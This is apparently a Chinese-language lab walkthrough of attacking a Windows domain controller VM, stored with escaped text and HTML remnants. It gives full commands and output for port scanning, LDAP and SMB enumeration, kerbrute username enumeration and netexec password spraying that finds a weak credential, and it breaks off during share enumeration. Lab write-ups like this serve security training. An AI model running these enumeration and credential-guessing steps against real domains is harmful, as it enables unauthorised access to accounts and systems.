![\"image-20250610235430296\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122420.png\")
<\/div><\/p>\n\u4e00\u6253\u5f00\u5c31\u662f\u4e00\u4e2a\u4e0b\u9a6c\u5a01\uff1a<\/p>\n
![\"image-20250612152532263\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122423.png\")
<\/div><\/p>\n\u5c06\u540d\u5b57\u4fee\u6539\u4e00\u4e0b\u5c31\u884c\u4e86\uff1a<\/p>\n
![\"image-20250612152610622\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122424.png\")
<\/div><\/p>\n\u968f\u4fbf\u4fee\u6539\u5565\u90fd\u884c\u3002<\/p>\n
![\"image-20250612152735198\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122425.png\")
<\/div><\/p>\n\uff01\uff01\uff01\uff01\uff01\u8be5\u5427\u5527\u591a\u6b21\u81ea\u5df1\u5173\u673a\uff0c\u4e2d\u9014\u5982\u679c\u547d\u4ee4\u8fd0\u884c\u4e0d\u51fa\u8bb0\u5f97\u67e5\u770b\u9776\u673a\u662f\u5426\u5173\u673a\u4e86\uff01\uff01\uff01\uff01\uff01<\/strong><\/p>\n \u53d1\u73b0\u5f00\u653e\u4e86 \u53d1\u73b0\u57df\u540d\u89e3\u6790\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6dfb\u52a0\uff1a<\/p>\n \u53d1\u73b0\u5b58\u5728\u597d\u51e0\u4e2a\u6587\u4ef6\u7cfb\u7edf\uff0c\u4f46\u662f\u54b1\u4eec\u5565\u90fd\u6ca1\u6709\uff0c\u770b\u770b\u522b\u7684\u5427\u3002<\/p>\n \u5f00\u542f\u4e86 \u53c2\u8003 https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ldap.html<\/a><\/p>\n<\/blockquote>\n \u53c8\u53d1\u73b0\u4e86\u4e00\u5904\u57df\u540d\u89e3\u6790\uff1a<\/p>\n \u53c2\u8003\uff1ahttps:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html?highlight=kerbrute#user-enumeration<\/a><\/p>\n<\/blockquote>\n \u5c1d\u8bd5\u6307\u5b9a\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u7528\u5230\u4e86\u5de5\u5177\uff1ahttps:\/\/github.com\/ropnop\/kerbrute\/releases<\/a><\/p>\n \u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u51ed\u8bc1\u53ef\u4ee5\u7206\u7834\u51fa\u4e1c\u897f\uff1a<\/p>\n \u5c1d\u8bd5\u679a\u4e3e\u53d1\u73b0\uff1a<\/p>\n \u53ea\u53d1\u73b0\u4e00\u4e2a\u51ed\u8bc1\uff1a \u4e5f\u53ef\u4ee5\u4f7f\u7528 \u5c1d\u8bd5\u8fde\u63a5\u770b\u4e00\u4e0b\uff1a<\/p>\n \u6ca1\u53d1\u73b0\u5565\u3002\u3002\u3002\u3002<\/p>\n RID\uff08Relative Identifier\uff09\u662f Windows \u5b89\u5168\u6807\u8bc6\u7b26\uff08SID\uff09\u7684\u672b\u6bb5\u6570\u5b57\uff0c\u7528\u4e8e\u5728\u57df\u6216\u672c\u5730\u7cfb\u7edf\u5185\u552f\u4e00\u6807\u8bc6\u7528\u6237\u6216\u7ec4\u3002<\/p>\n RID brute\uff08RID \u66b4\u529b\u679a\u4e3e\uff09<\/strong> \u6307\u4e00\u79cd\u653b\u51fb\u6280\u672f\uff0c\u901a\u8fc7\u81ea\u52a8\u5316\u5de5\u5177\u7cfb\u7edf\u6027\u5730\u904d\u5386\u6240\u6709\u53ef\u80fd\u7684 RID \u503c<\/strong>\uff08\u5982\u4ece 500 \u5230\u6570\u4e07\uff09\uff0c\u63a2\u6d4b\u7cfb\u7edf\u4e2d\u5b58\u5728\u7684\u7528\u6237\u6216\u7ec4\u8d26\u6237\uff0c\u5c24\u5176\u9488\u5bf9\u9690\u85cf\u8d26\u6237\u6216\u6743\u9650\u88ab\u7be1\u6539\u7684\u8d26\u6237<\/strong>\u3002<\/p>\n<\/blockquote>\n \u53c2\u8003\uff1ahttps:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/asreproast.html?highlight=AS-REP#asreproast-without-credentials<\/a><\/p>\n \u9996\u5148\u662f\u5c1d\u8bd5\u8fdb\u884c\u63d0\u53d6 \u7136\u540e\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n \u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n \u5b8c\u7f8e\u7b26\u5408 \u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff01<\/p>\n \u5f97\u5230\u4e86\u65b0\u51ed\u8bc1 \u5c1d\u8bd5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n
\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.101:88\nOpen 192.168.10.101:53\nOpen 192.168.10.101:135\nOpen 192.168.10.101:139\nOpen 192.168.10.101:389\nOpen 192.168.10.101:445\nOpen 192.168.10.101:464\nOpen 192.168.10.101:593\nOpen 192.168.10.101:636\nOpen 192.168.10.101:3268\nOpen 192.168.10.101:5985\nOpen 192.168.10.101:9389\nOpen 192.168.10.101:49664\nOpen 192.168.10.101:49668\nOpen 192.168.10.101:49672\nOpen 192.168.10.101:49685\nOpen 192.168.10.101:49693\n\nPORT STATE SERVICE REASON VERSION\n53\/tcp open domain syn-ack ttl 128 Simple DNS Plus\n88\/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-12 22:31:14Z)\n135\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp open microsoft-ds? syn-ack ttl 128\n464\/tcp open kpasswd5? syn-ack ttl 128\n593\/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp open tcpwrapped syn-ack ttl 128\n3268\/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n5985\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing\n49664\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49668\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49672\/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49685\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49693\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:65:C6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 16534\/tcp): CLEAN (Timeout)\n| Check 2 (port 48975\/tcp): CLEAN (Timeout)\n| Check 3 (port 19523\/udp): CLEAN (Timeout)\n| Check 4 (port 55768\/udp): CLEAN (Timeout)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 14h59m58s\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled and required\n| smb2-time: \n| date: 2025-06-12T22:32:02\n|_ start_date: N\/A\n| nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:65:c6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n| SOUPEDECODE<1c> Flags: <group><active>\n| DC01<00> Flags: <unique><active>\n| SOUPEDECODE<00> Flags: <group><active>\n| DC01<20> Flags: <unique><active>\n| SOUPEDECODE<1b> Flags: <unique><active>\n| Statistics:\n| 08:00:27:65:c6:82:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u654f\u611f\u670d\u52a1\u63a2\u6d4b<\/h3>\n
SMB\u670d\u52a1<\/h4>\n
445<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb 192.168.10.101 -u "" -p "" --shares \nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\: STATUS_ACCESS_DENIED \nSMB 192.168.10.101 445 DC01 [-] Error enumerating shares: Error occurs while reading from remote(104)<\/code><\/pre>\n192.168.10.101 SOUPEDECODE.LOCAL<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Thu Jun 12 03:42:45 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n SOUPEDECODE <1c> - <GROUP> B <ACTIVE> Domain Controllers\n DC01 <00> - B <ACTIVE> Workstation Service\n SOUPEDECODE <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n DC01 <20> - B <ACTIVE> File Server Service\n SOUPEDECODE <1b> - B <ACTIVE> Domain Master Browser\n\n MAC Address = 08-00-27-65-C6-82\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.<\/code><\/pre>\nLDAP\u670d\u52a1<\/h4>\n
389<\/code>\u548c636<\/code>\u7aef\u53e3<\/p>\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ nmap -n -sV --script "ldap* and not brute" $IP \n\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 03:52 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00086s latency).\nNot shown: 988 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n53\/tcp open domain Simple DNS Plus\n88\/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-12 22:52:30Z)\n135\/tcp open msrpc Microsoft Windows RPC\n139\/tcp open netbios-ssn Microsoft Windows netbios-ssn\n389\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n| <ROOT>\n| domainFunctionality: 7\n| forestFunctionality: 7\n| domainControllerFunctionality: 7\n| rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n| isGlobalCatalogReady: TRUE\n| supportedSASLMechanisms: GSSAPI\n| supportedSASLMechanisms: GSS-SPNEGO\n| supportedSASLMechanisms: EXTERNAL\n| supportedSASLMechanisms: DIGEST-MD5\n| supportedLDAPVersion: 3\n| supportedLDAPVersion: 2\n| supportedLDAPPolicies: MaxPoolThreads\n| supportedLDAPPolicies: MaxPercentDirSyncRequests\n| supportedLDAPPolicies: MaxDatagramRecv\n| supportedLDAPPolicies: MaxReceiveBuffer\n| supportedLDAPPolicies: InitRecvTimeout\n| supportedLDAPPolicies: MaxConnections\n| supportedLDAPPolicies: MaxConnIdleTime\n| supportedLDAPPolicies: MaxPageSize\n| supportedLDAPPolicies: MaxBatchReturnMessages\n| supportedLDAPPolicies: MaxQueryDuration\n| supportedLDAPPolicies: MaxDirSyncDuration\n| supportedLDAPPolicies: MaxTempTableSize\n| supportedLDAPPolicies: MaxResultSetSize\n| supportedLDAPPolicies: MinResultSets\n| supportedLDAPPolicies: MaxResultSetsPerConn\n| supportedLDAPPolicies: MaxNotificationPerConn\n| supportedLDAPPolicies: MaxValRange\n| supportedLDAPPolicies: MaxValRangeTransitive\n| supportedLDAPPolicies: ThreadMemoryLimit\n| supportedLDAPPolicies: SystemMemoryLimitPercent\n| supportedControl: 1.2.840.113556.1.4.319\n| supportedControl: 1.2.840.113556.1.4.801\n| supportedControl: 1.2.840.113556.1.4.473\n| supportedControl: 1.2.840.113556.1.4.528\n| supportedControl: 1.2.840.113556.1.4.417\n| supportedControl: 1.2.840.113556.1.4.619\n| supportedControl: 1.2.840.113556.1.4.841\n| supportedControl: 1.2.840.113556.1.4.529\n| supportedControl: 1.2.840.113556.1.4.805\n| supportedControl: 1.2.840.113556.1.4.521\n| supportedControl: 1.2.840.113556.1.4.970\n| supportedControl: 1.2.840.113556.1.4.1338\n| supportedControl: 1.2.840.113556.1.4.474\n| supportedControl: 1.2.840.113556.1.4.1339\n| supportedControl: 1.2.840.113556.1.4.1340\n| supportedControl: 1.2.840.113556.1.4.1413\n| supportedControl: 2.16.840.1.113730.3.4.9\n| supportedControl: 2.16.840.1.113730.3.4.10\n| supportedControl: 1.2.840.113556.1.4.1504\n| supportedControl: 1.2.840.113556.1.4.1852\n| supportedControl: 1.2.840.113556.1.4.802\n| supportedControl: 1.2.840.113556.1.4.1907\n| supportedControl: 1.2.840.113556.1.4.1948\n| supportedControl: 1.2.840.113556.1.4.1974\n| supportedControl: 1.2.840.113556.1.4.1341\n| supportedControl: 1.2.840.113556.1.4.2026\n| supportedControl: 1.2.840.113556.1.4.2064\n| supportedControl: 1.2.840.113556.1.4.2065\n| supportedControl: 1.2.840.113556.1.4.2066\n| supportedControl: 1.2.840.113556.1.4.2090\n| supportedControl: 1.2.840.113556.1.4.2205\n| supportedControl: 1.2.840.113556.1.4.2204\n| supportedControl: 1.2.840.113556.1.4.2206\n| supportedControl: 1.2.840.113556.1.4.2211\n| supportedControl: 1.2.840.113556.1.4.2239\n| supportedControl: 1.2.840.113556.1.4.2255\n| supportedControl: 1.2.840.113556.1.4.2256\n| supportedControl: 1.2.840.113556.1.4.2309\n| supportedControl: 1.2.840.113556.1.4.2330\n| supportedControl: 1.2.840.113556.1.4.2354\n| supportedCapabilities: 1.2.840.113556.1.4.800\n| supportedCapabilities: 1.2.840.113556.1.4.1670\n| supportedCapabilities: 1.2.840.113556.1.4.1791\n| supportedCapabilities: 1.2.840.113556.1.4.1935\n| supportedCapabilities: 1.2.840.113556.1.4.2080\n| supportedCapabilities: 1.2.840.113556.1.4.2237\n| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| isSynchronized: TRUE\n| highestCommittedUSN: 49180\n| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| dnsHostName: DC01.SOUPEDECODE.LOCAL\n| defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| currentTime: 20250612225230.0Z\n|_ configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp open microsoft-ds?\n464\/tcp open kpasswd5?\n593\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n636\/tcp open tcpwrapped\n3268\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n| <ROOT>\n| domainFunctionality: 7\n| forestFunctionality: 7\n| domainControllerFunctionality: 7\n| rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n| isGlobalCatalogReady: TRUE\n| supportedSASLMechanisms: GSSAPI\n| supportedSASLMechanisms: GSS-SPNEGO\n| supportedSASLMechanisms: EXTERNAL\n| supportedSASLMechanisms: DIGEST-MD5\n| supportedLDAPVersion: 3\n| supportedLDAPVersion: 2\n| supportedLDAPPolicies: MaxPoolThreads\n| supportedLDAPPolicies: MaxPercentDirSyncRequests\n| supportedLDAPPolicies: MaxDatagramRecv\n| supportedLDAPPolicies: MaxReceiveBuffer\n| supportedLDAPPolicies: InitRecvTimeout\n| supportedLDAPPolicies: MaxConnections\n| supportedLDAPPolicies: MaxConnIdleTime\n| supportedLDAPPolicies: MaxPageSize\n| supportedLDAPPolicies: MaxBatchReturnMessages\n| supportedLDAPPolicies: MaxQueryDuration\n| supportedLDAPPolicies: MaxDirSyncDuration\n| supportedLDAPPolicies: MaxTempTableSize\n| supportedLDAPPolicies: MaxResultSetSize\n| supportedLDAPPolicies: MinResultSets\n| supportedLDAPPolicies: MaxResultSetsPerConn\n| supportedLDAPPolicies: MaxNotificationPerConn\n| supportedLDAPPolicies: MaxValRange\n| supportedLDAPPolicies: MaxValRangeTransitive\n| supportedLDAPPolicies: ThreadMemoryLimit\n| supportedLDAPPolicies: SystemMemoryLimitPercent\n| supportedControl: 1.2.840.113556.1.4.319\n| supportedControl: 1.2.840.113556.1.4.801\n| supportedControl: 1.2.840.113556.1.4.473\n| supportedControl: 1.2.840.113556.1.4.528\n| supportedControl: 1.2.840.113556.1.4.417\n| supportedControl: 1.2.840.113556.1.4.619\n| supportedControl: 1.2.840.113556.1.4.841\n| supportedControl: 1.2.840.113556.1.4.529\n| supportedControl: 1.2.840.113556.1.4.805\n| supportedControl: 1.2.840.113556.1.4.521\n| supportedControl: 1.2.840.113556.1.4.970\n| supportedControl: 1.2.840.113556.1.4.1338\n| supportedControl: 1.2.840.113556.1.4.474\n| supportedControl: 1.2.840.113556.1.4.1339\n| supportedControl: 1.2.840.113556.1.4.1340\n| supportedControl: 1.2.840.113556.1.4.1413\n| supportedControl: 2.16.840.1.113730.3.4.9\n| supportedControl: 2.16.840.1.113730.3.4.10\n| supportedControl: 1.2.840.113556.1.4.1504\n| supportedControl: 1.2.840.113556.1.4.1852\n| supportedControl: 1.2.840.113556.1.4.802\n| supportedControl: 1.2.840.113556.1.4.1907\n| supportedControl: 1.2.840.113556.1.4.1948\n| supportedControl: 1.2.840.113556.1.4.1974\n| supportedControl: 1.2.840.113556.1.4.1341\n| supportedControl: 1.2.840.113556.1.4.2026\n| supportedControl: 1.2.840.113556.1.4.2064\n| supportedControl: 1.2.840.113556.1.4.2065\n| supportedControl: 1.2.840.113556.1.4.2066\n| supportedControl: 1.2.840.113556.1.4.2090\n| supportedControl: 1.2.840.113556.1.4.2205\n| supportedControl: 1.2.840.113556.1.4.2204\n| supportedControl: 1.2.840.113556.1.4.2206\n| supportedControl: 1.2.840.113556.1.4.2211\n| supportedControl: 1.2.840.113556.1.4.2239\n| supportedControl: 1.2.840.113556.1.4.2255\n| supportedControl: 1.2.840.113556.1.4.2256\n| supportedControl: 1.2.840.113556.1.4.2309\n| supportedControl: 1.2.840.113556.1.4.2330\n| supportedControl: 1.2.840.113556.1.4.2354\n| supportedCapabilities: 1.2.840.113556.1.4.800\n| supportedCapabilities: 1.2.840.113556.1.4.1670\n| supportedCapabilities: 1.2.840.113556.1.4.1791\n| supportedCapabilities: 1.2.840.113556.1.4.1935\n| supportedCapabilities: 1.2.840.113556.1.4.2080\n| supportedCapabilities: 1.2.840.113556.1.4.2237\n| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| isSynchronized: TRUE\n| highestCommittedUSN: 49180\n| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| dnsHostName: DC01.SOUPEDECODE.LOCAL\n| defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| currentTime: 20250612225230.0Z\n|_ configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open tcpwrapped\n5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:65:C6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.05 seconds<\/code><\/pre>\n192.168.10.101 DC01.SOUPEDECODE.LOCAL<\/code><\/pre>\nkerbrute \u7206\u7834<\/h4>\n
\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='SOUPEDECODE.LOCAL'" $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 04:06 EDT\nNmap scan report for SOUPEDECODE.LOCAL (192.168.10.101)\nHost is up (0.00066s latency).\n\nPORT STATE SERVICE\n88\/tcp open kerberos-sec\n| krb5-enum-users: \n| Discovered Kerberos principals\n| admin@SOUPEDECODE.LOCAL\n|_ administrator@SOUPEDECODE.LOCAL\nMAC Address: 08:00:27:65:C6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.63 seconds<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ .\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc 192.168.10.101 \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt -t 50\n\n __ __ __ \n \/ \/_____ _____\/ \/_ _______ __\/ \/____ \n \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,< \/ __\/ \/ \/ \/_\/ \/ \/ \/ \/_\/ \/ \/_\/ __\/\n\/_\/|_|\\___\/_\/ \/_.___\/_\/ \\__,_\/\\__\/\\___\/ \n\nVersion: v1.0.3 (9dad6e1) - 06\/12\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/12 04:51:39 > Using KDC(s):\n2025\/06\/12 04:51:39 > 192.168.10.101:88\n\n2025\/06\/12 04:51:39 > [+] VALID USERNAME: admin@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:39 > [+] VALID USERNAME: charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:40 > [+] VALID USERNAME: Charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:40 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:40 > [+] VALID USERNAME: Admin@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:51 > [+] VALID USERNAME: Administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:52 > [+] VALID USERNAME: CHARLIE@SOUPEDECODE.LOCAL\n2025\/06\/12 04:52:47 > [+] VALID USERNAME: ADMIN@SOUPEDECODE.LOCAL\n2025\/06\/12 05:04:51 > [+] VALID USERNAME: wreed11@SOUPEDECODE.LOCAL\n^C<\/code><\/pre>\nadmin\ncharlie\nadministrator\nwreed11<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb SOUPEDECODE.LOCAL -u dict -p dict --continue-on-success\nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\admin:admin STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\charlie:admin STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\administrator:admin STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\wreed11:admin STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\admin:charlie STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [+] SOUPEDECODE.LOCAL\\charlie:charlie \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\administrator:charlie STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\wreed11:charlie STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\admin:administrator STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\administrator:administrator STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\wreed11:administrator STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\admin:wreed11 STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\administrator:wreed11 STATUS_LOGON_FAILURE \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\wreed11:wreed11 STATUS_LOGON_FAILURE <\/code><\/pre>\ncharlie:charlie <\/code>.<\/p>\n\u679a\u4e3e\u4fe1\u606f<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -d 'SOUPEDECODE.LOCAL' -u charlie -p charlie --shares\nSMB 192.168.10.107 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.107 445 DC01 [+] SOUPEDECODE.LOCAL\\charlie:charlie \nSMB 192.168.10.107 445 DC01 [*] Enumerated shares\nSMB 192.168.10.107 445 DC01 Share Permissions Remark\nSMB 192.168.10.107 445 DC01 ----- ----------- ------\nSMB 192.168.10.107 445 DC01 ADMIN$ Remote Admin\nSMB 192.168.10.107 445 DC01 C$ Default share\nSMB 192.168.10.107 445 DC01 IPC$ READ Remote IPC\nSMB 192.168.10.107 445 DC01 NETLOGON READ Logon server share \nSMB 192.168.10.107 445 DC01 SYSVOL READ Logon server share<\/code><\/pre>\nsmbmap<\/code>:<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbmap -u charlie -p charlie -d workgroup -H $IP \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authenticated session(s) \n\n[+] IP: 192.168.10.107:445 Name: 192.168.10.107 Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n ADMIN$ NO ACCESS Remote Admin\n C$ NO ACCESS Default 